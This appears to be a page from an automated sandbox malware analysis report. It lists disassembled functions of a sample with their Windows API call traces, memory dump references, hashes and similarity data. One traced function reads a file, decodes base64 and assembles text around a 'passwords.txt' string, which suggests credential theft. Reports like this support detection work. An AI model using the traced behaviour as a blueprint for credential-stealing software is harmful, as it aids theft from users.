                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DEE04278A55644DFC741CF58D195E99B7F0EB09368F158199E806DB761C274EE00DF00
                                                                                                                                                                                                                                                          Function 00FE147A Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                                                                                                          • Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58
                                                                                                                                                                                                                                                          Function 00FE1492 Relevance: .0, Instructions: 3COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                                                                                                                                                                          • Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950
                                                                                                                                                                                                                                                          Function 00FEDE54 Relevance: 90.4, APIs: 60, Instructions: 399memorystringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FEDD33: lstrlenA.KERNEL32(?,76885460,?,00000000), ref: 00FEDD6F
                                                                                                                                                                                                                                                            • Part of subcall function 00FEDD33: strchr.MSVCRT ref: 00FEDD81
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,76885460,?,00000000), ref: 00FEDEB8
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00FEDEBF
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00FEDED4
                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00FEDEDB
                                                                                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 00FEDEF7
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00FEDF09
                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00FEDF16
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FEDF47
                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00FEDF4E
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 00FEDF55
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00FEDF5C
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00FEDF71
                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00FEDF78
                                                                                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 00FEDF8E
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00FEDFA0
                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00FEDFA7
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FEDFC5
                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00FEDFCC
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 00FEDFD3
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00FEDFDA
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00FEDFEF
                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00FEDFF6
                                                                                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 00FEE006
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00FEE018
                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00FEE01F
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FEE047
                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00FEE04E
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 00FEE055
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00FEE05C
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00FEE077
                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00FEE07E
                                                                                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 00FEE091
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00FEE0A3
                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00FEE0AA
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00FEE0B3
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00FEE0C9
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00FEE0D0
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00FEE0E8
                                                                                                                                                                                                                                                            • Part of subcall function 00FEF54B: std::_Xinvalid_argument.LIBCPMT ref: 00FEF561
                                                                                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 00FEE129
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,00000001,00000001), ref: 00FEE14F
                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00FEE15C
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FEE161
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000001), ref: 00FEE170
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00FEE177
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00FEE18B
                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00FEE192
                                                                                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 00FEE1A0
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00FEE1AD
                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00FEE1B4
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00FEE1E9
                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00FEE1F0
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 00FEE1F7
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00FEE1FE
                                                                                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 00FEE219
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00FEE22B
                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00FEE232
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00FEE2D6
                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00FEE2DD
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00FEE327
                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00FEE32E
                                                                                                                                                                                                                                                            • Part of subcall function 00FEDD33: strchr.MSVCRT ref: 00FEDDA6
                                                                                                                                                                                                                                                            • Part of subcall function 00FEDD33: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FEDEAB), ref: 00FEDDC8
                                                                                                                                                                                                                                                            • Part of subcall function 00FEDD33: GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FEDDD5
                                                                                                                                                                                                                                                            • Part of subcall function 00FEDD33: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FEDEAB), ref: 00FEDDDC
                                                                                                                                                                                                                                                            • Part of subcall function 00FEDD33: strcpy_s.MSVCRT ref: 00FEDE23
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$strchr$Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 838878465-0
                                                                                                                                                                                                                                                          • Opcode ID: 7738935f6c9b8d0d9e55e8ceba94fd16851ddbf8d2fe70c04c858815b6808a15
                                                                                                                                                                                                                                                          • Instruction ID: 0a6e92e228025c74c55a4f19aa67d50fc9c90aab57ee2b32094aec1fe218306d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7738935f6c9b8d0d9e55e8ceba94fd16851ddbf8d2fe70c04c858815b6808a15
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83E12872C0425AAFDF319FF1EC88A9DBFB9BF48310F24446AE215A3116CB765584AF50
                                                                                                                                                                                                                                                          Function 00FEAA4F Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 211stringmemoryfileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,010163D8,01015816), ref: 00FEAAFA
                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAB12
                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAB1A
                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAB26
                                                                                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAB30
                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAB42
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAB4E
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAB55
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00FEB95E,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAB66
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(-00000010,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAB80
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAB93
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAB9D
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,010163DC,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEABA9
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEABB3
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,010163E0,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEABBF
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEABCC
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,-00000010,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEABD4
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,010163E4,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEABE0
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEABF0
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAC00
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAC13
                                                                                                                                                                                                                                                            • Part of subcall function 00FEA911: _memset.LIBCMT ref: 00FEA94E
                                                                                                                                                                                                                                                            • Part of subcall function 00FEA911: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,00FEAC20), ref: 00FEA969
                                                                                                                                                                                                                                                            • Part of subcall function 00FEA911: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 00FEA971
                                                                                                                                                                                                                                                            • Part of subcall function 00FEA911: _memmove.LIBCMT ref: 00FEA9F4
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAC22
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,010163E8,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAC2E
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAC3E
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAC4E
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAC61
                                                                                                                                                                                                                                                            • Part of subcall function 00FEA911: lstrcatA.KERNEL32(0101580E,01015812,?,00000000,00000000,00000000,00000000,00000014,?,00FEAC20), ref: 00FEAA1E
                                                                                                                                                                                                                                                            • Part of subcall function 00FEA911: lstrcatA.KERNEL32(0101580E,01015813,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,00FEAC20), ref: 00FEAA34
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAC70
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,010163EC,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAC7C
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,010163F0,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAC88
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,00FEB95E), ref: 00FEAC98
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00FEACB6
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00FEACE5
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$File$lstrcpy$lstrlen$HeapPointer$AllocBinaryCloseCreateCryptHandleProcessReadSizeString_memmove_memset
                                                                                                                                                                                                                                                          • String ID: passwords.txt
                                                                                                                                                                                                                                                          • API String ID: 1221571796-347816968
